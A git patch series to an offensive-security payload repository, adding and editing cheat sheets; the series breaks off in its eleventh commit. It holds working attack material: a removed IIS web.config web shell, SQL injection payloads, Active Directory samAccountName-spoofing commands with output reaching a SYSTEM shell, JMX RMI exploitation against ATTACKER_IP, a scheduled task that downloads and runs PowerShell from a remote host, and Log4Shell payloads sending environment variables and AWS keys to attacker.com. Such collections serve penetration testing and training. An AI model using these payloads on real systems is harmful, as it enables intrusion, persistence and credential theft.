From a09254623017d435f107700407a4bb4768fcdba1 Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Mon, 9 Aug 2021 22:47:57 +1200 Subject: [PATCH 01/50] Delete web.config as it's not working --- .../Configuration IIS web.config/web.config | 34 ------------------- 1 file changed, 34 deletions(-) delete mode 100644 Upload Insecure Files/Configuration IIS web.config/web.config diff --git a/Upload Insecure Files/Configuration IIS web.config/web.config b/Upload Insecure Files/Configuration IIS web.config/web.config deleted file mode 100644 index c14f37e..0000000 --- a/Upload Insecure Files/Configuration IIS web.config/web.config +++ /dev/null @@ -1,34 +0,0 @@ - - - - - - - - - - - - - - - - - - - - -") -Response.write("

-
")

-
Set wShell1 = CreateObject("WScript.Shell")
-Set cmd1 = wShell1.Exec("whoami")
-output1 = cmd1.StdOut.Readall()
-set cmd1 = nothing: Set wShell1 = nothing

-
Response.write(output1)
-Response.write("
-

-–> - - \ No newline at end of file From 31a1cdc86f2cc4b1456ffba025d69504b1efee5f Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Mon, 9 Aug 2021 22:48:10 +1200 Subject: [PATCH 02/50] Rename web.web.config to web.config --- .../Configuration IIS web.config/{web.web.config => web.config} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename Upload Insecure Files/Configuration IIS web.config/{web.web.config => web.config} (100%) diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.config similarity index 100% rename from Upload Insecure Files/Configuration IIS web.config/web.web.config rename to Upload Insecure Files/Configuration IIS web.config/web.config From 51ac02d3548bfcccf19b043530181082bb4a75d5 Mon Sep 17 00:00:00 2001 From: "Eduardo Barbosa (an4kein)" <37910997+an4kein@users.noreply.github.com> Date: Tue, 23 Nov 2021 14:04:53 -0300 Subject: [PATCH 03/50] Update README.md Find open buckets: https://buckets.grayhatwarfare.com/ --- AWS Amazon Bucket S3/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 97b1fd6..5abe5f9 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -52,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na http://s3.amazonaws.com/[bucket_name]/ http://[bucket_name].s3.amazonaws.com/ http://flaws.cloud.s3.amazonaws.com/ +https://buckets.grayhatwarfare.com/ ``` Their names are also listed if the listing is enabled. From 03427da53485db82e5c78eca8c5008f16a25ae11 Mon Sep 17 00:00:00 2001 From: Brian Stadnicki Date: Tue, 7 Dec 2021 06:51:27 +0000 Subject: [PATCH 04/50] SQLite Injection add extract database structure --- SQL Injection/SQLite Injection.md | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 1d3b8d9..739f49d 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -4,6 +4,7 @@ * [SQLite comments](#sqlite-comments) * [SQLite version](#sqlite-version) +* [String based - Extract database structure](#string-based---extract-database-structure) * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) * [Boolean - Count number of tables](#boolean---count-number-of-tables) @@ -26,6 +27,12 @@ select sqlite_version(); ``` +## String based - Extract database structure + +```sql +SELECT sql FROM sqlite_schema +``` + ## Integer/String based - Extract table name ```sql From 10974722b1601dd19bd8f3f101f11765073dcd7a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 12 Dec 2021 23:04:35 +0100 Subject: [PATCH 05/50] BloodHound Custom Queries + MSSQL CLR --- Methodology and Resources/Active Directory Attack.md | 6 +++++- .../MSSQL Server - Cheatsheet.md | 11 +++++++++++ Methodology and Resources/Windows - Persistence.md | 1 + 3 files changed, 17 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 334958f..48fc398 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -254,7 +254,7 @@ root@payload$ ./bloodhound --no-sandbox Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j ``` -You can add some custom queries like [Bloodhound-Custom-Queries](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) from @hausec. Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. +You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. ### Using PowerView @@ -3252,3 +3252,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) * [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) * [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) +* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) +* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) +* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) +* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index f187e21..485649a 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -340,6 +340,17 @@ EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' ``` + +```powershell +# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py +python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll +python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll' +python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll' +SQL> enable_ole +SQL> upload reciclador.dll C:\windows\temp\reciclador.dll +``` + + ## Agent Jobs ### Execute commands through SQL Agent Job service diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index db779d2..b17d638 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -273,6 +273,7 @@ Register-ScheduledTask "Backdoor" -InputObject $D # Native schtasks schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM" schtasks /create /sc minute /mo 1 /tn "eviltask" /tr calc /ru "SYSTEM" /s dc-mantvydas /u user /p password +schtasks /Create /RU "NT AUTHORITY\SYSTEM" /tn [TaskName] /tr "regsvr32.exe -s \"C:\Users\*\AppData\Local\Temp\[payload].dll\"" /SC ONCE /Z /ST [Time] /ET [Time] ##(X86) - On User Login schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System From 5714b9c9d773dce871c0afdae9c288a21dfe5807 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 13 Dec 2021 20:42:31 +0100 Subject: [PATCH 06/50] samAccountName spoofing + Java RMI --- Java RMI/README.md | 63 +++++++++++++ .../Active Directory Attack.md | 89 +++++++++++++++++++ 2 files changed, 152 insertions(+) create mode 100644 Java RMI/README.md diff --git a/Java RMI/README.md b/Java RMI/README.md new file mode 100644 index 0000000..97b33fa --- /dev/null +++ b/Java RMI/README.md @@ -0,0 +1,63 @@ +# Java RMI + +> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host. + +## Summary + +* [Exploitation](#exploitation) + * [Requirements](#requirements) + * [Detection](#detection) + * [Remote Command Execution](#remote-command-execution) +* [References](#references) + +## Exploitation + +### Requirements +- Jython +- The JMX server can connect to a http service that is controlled by the attacker +- JMX authentication is not enabled + + +### Detection + +```powershell +$ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v +1089/tcp open java-rmi Java RMI +| rmi-vuln-classloader: +| VULNERABLE: +| RMI registry default configuration remote code execution vulnerability +| State: VULNERABLE +| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. +| rmi-dumpregistry: +| jmxrmi +| javax.management.remote.rmi.RMIServerImpl_Stub +``` + +### Remote Command Execution + +The attack involves the following steps: +* Starting a web server that hosts the MLet and a JAR file with the malicious MBeans +* Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX +* Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. +* The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. +* The attacker finally invokes methods from the malicious MBean. + +Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet) + +```powershell +jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 +jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" +jython sjet.py TARGET_IP TARGET_PORT super_secret shell +jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password +jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall +jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" + +jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 +jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" +jython mjet.py TARGET_IP TARGET_PORT command super_secret shell +``` + +## References + +* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) +* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 48fc398..b7b5d36 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -14,6 +14,7 @@ - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) - [ZeroLogon](#zerologon) - [PrintNightmare](#printnightmare) + - [samAccountName spoofing](#samaccountname-spoofing) - [Open Shares](#open-shares) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [SCF Files](#scf-files) @@ -672,6 +673,92 @@ Requirements: | 0x180 | unknown error code | Share is not SMB2 | +#### samAccountName spoofing + +**Requirements** +* MachineAccountQuota > 0 + +**Exploitation** + +0. Create a computer account + ```powershell + impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' + + powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force + powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose + ``` +1. Clear the controlled machine account `servicePrincipalName` attribute + ```ps1 + impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController + + powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose + ``` +2. (CVE-2021-42278) Change the controlled machine account `sAMAccountName` to a Domain Controller's name without the trailing `$` + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1224 + impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose + ``` +3. Request a TGT for the controlled machine account + ```ps1 + impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' + + cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap + ``` +4. Reset the controlled machine account sAMAccountName to its old value + ```ps1 + impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' + + powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose + ``` +5. (CVE-2021-42287) Request a service ticket with `S4U2self` by presenting the TGT obtained before + ```ps1 + # https://github.com/SecureAuthCorp/impacket/pull/1202 + impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' + + cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT] + ``` +6. DCSync: `KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'` + +Automated exploitation: + +* [noPac - @cube0x0](https://github.com/cube0x0/noPac) + ```powershell + noPac.exe scan -domain htb.local -user user -pass 'password123' + noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt + noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator + ``` +* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin) + ```ps1 + $ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell + [*] Selected Target dc.caltech.white + [*] Total Domain Admins 11 + [*] will try to impersonat gaylene.dreddy + [*] Current ms-DS-MachineAccountQuota = 10 + [*] Adding Computer Account "SAMTHEADMIN-11$" + [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL + [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. + [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white + [*] SAMTHEADMIN-11$ sAMAccountName == dc + [*] Saving ticket in dc.ccache + [*] Resting the machine account to SAMTHEADMIN-11$ + [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value + [*] Using TGT from cache + [*] Impersonating gaylene.dreddy + [*] Requesting S4U2self + [*] Saving ticket in gaylene.dreddy.ccache + [!] Launching semi-interactive shell - Careful what you execute + C:\Windows\system32>whoami + nt authority\system + ``` + +**Mitigations**: +* KB5008602 +* [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) +* [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) + + ### Open Shares > Some shares can be accessible without authentication, explore them to find some juicy files @@ -3256,3 +3343,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) +* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) \ No newline at end of file From 4ab26493170b2fd85c2d518d74324d1d73e0270a Mon Sep 17 00:00:00 2001 From: malet <6935429+gitmalet@users.noreply.github.com> Date: Tue, 14 Dec 2021 19:54:41 +0100 Subject: [PATCH 07/50] Fixing "RCE - Attach Database" Payload The old payload doesn't work for many cases as the `php` in `');-- +INSERT INTO lol.pwn (dataz) VALUES ('');-- ``` ## Remote Command Execution using SQLite command - Load_extension From 0d6d6049ce03272d6e934247ab57263bc04ea625 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 16 Dec 2021 09:52:51 +0100 Subject: [PATCH 08/50] AD + Log4shell + Windows Startup --- CVE Exploits/Log4Shell.md | 105 ++++++++++++++++++ .../Active Directory Attack.md | 3 + .../Cobalt Strike - Cheatsheet.md | 3 +- .../Windows - Persistence.md | 8 ++ 4 files changed, 118 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/Log4Shell.md diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md new file mode 100644 index 0000000..6ca8e89 --- /dev/null +++ b/CVE Exploits/Log4Shell.md @@ -0,0 +1,105 @@ +# CVE-2021-44228 Log4Shell + +> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled + +## Summary + +* [Vulnerable code](#vulnerable-code) +* [Payloads](#payloads) +* [Scanning](#scanning) +* [WAF Bypass](#waf-bypass) +* [Exploitation](#exploitation) + * [Environment variables exfiltration](#environment-variables-exfiltration) + * [Remote Command Execution](#remote-command-execution) +* [References](#references) + +## Vulnerable code + +You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn]( +https://github.com/leonjza/log4jpwn) +```java +public String index(@RequestHeader("X-Api-Version") String apiVersion) { + logger.info("Received a request for API version " + apiVersion); + return "Hello, world!"; +} +``` + +## Payloads + +```bash +# Identify Java version and hostname +${jndi:ldap://${java:version}.domain/a} +${jndi:ldap://${env:JAVA_VERSION}.domain/a} +${jndi:ldap://${sys:java.version}.domain/a} +${jndi:ldap://${sys:java.vendor}.domain/a} +${jndi:ldap://${hostName}.domain/a} +${jndi:dns://${hostName}.domain} + +# More enumerations keywords and variables +java:os +docker:containerId +web:rootDir +bundle:config:db.password +``` + +## Scanning + +* [log4j-scan](https://github.com/fullhunt/log4j-scan) + ```powershell + usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] + [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] + python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test + python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass + ``` +* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) + + +## WAF Bypass + +```powershell +${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} + +# using lower and upper +${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} +${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} +${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} + +# using env to create the letter +${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} +``` + +## Exploitation + +### Environment variables exfiltration + +```powershell +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ + +# AWS Access Key +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} +``` + + +### Remote Command Execution + +* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) + ```ps1 + java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" + Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat + Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy + Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 + Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 + ``` +* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) + + +## References + +* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/) +* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) +* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b7b5d36..c9644aa 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ - [Alternatives - modules](#alternatives---modules) - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) + - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - [Password spraying](#password-spraying) - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) @@ -675,6 +676,8 @@ Requirements: #### samAccountName spoofing +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. + **Requirements** * MachineAccountQuota > 0 diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index de13806..c0f374e 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -500,4 +500,5 @@ beacon> PortBender redirect 445 8445 * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) -* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) \ No newline at end of file +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index b17d638..39847c0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -18,6 +18,7 @@ * [Registry HKLM](#registry-hklm) * [Winlogon Helper DLL](#) * [GlobalFlag](#) + * [Startup Elevated](#startup-elevated) * [Services Elevated](#services-elevated) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Binary Replacement](#binary-replacement) @@ -235,6 +236,13 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\not reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" ``` +### Startup Elevated + +Create a batch script in the user startup folder. + +```powershell +C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp +``` ### Services Elevated From a568270b15e3676ef9189d45cc7617df645508d0 Mon Sep 17 00:00:00 2001 From: Alex G <24873615+Zeecka@users.noreply.github.com> Date: Thu, 16 Dec 2021 12:11:25 +0100 Subject: [PATCH 09/50] Add NAME_CONST for MySQL Error based injection --- SQL Injection/MySQL Injection.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 1764a13..7edb7e2 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -220,6 +220,16 @@ Works with `MySQL >= 5.1` ?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` +### MYSQL Error Based - NAME_CONST function (only for constants) + +Works with `MySQL >= 5.0` + +```sql +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)-- +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)-- +?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)-- +``` + ## MYSQL Blind ### MYSQL Blind with substring equivalent From a430cfcc4ea0a43ed07f3e8fe2af01cfab63ca96 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 22 Dec 2021 16:09:07 +0100 Subject: [PATCH 10/50] update PowerGPOAbuse task command --- Methodology and Resources/Active Directory Attack.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c9644aa..493a36e 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1021,7 +1021,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' # Create an immediate task -PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator +PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' ``` #### Abuse GPO with pyGPOAbuse @@ -3347,4 +3347,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) * [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) * [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) -* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) \ No newline at end of file +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) From e3fb516747b89419e2974f701beb16b14a679f28 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 29 Dec 2021 14:48:42 +0100 Subject: [PATCH 11/50] MAQ + WEBDAV 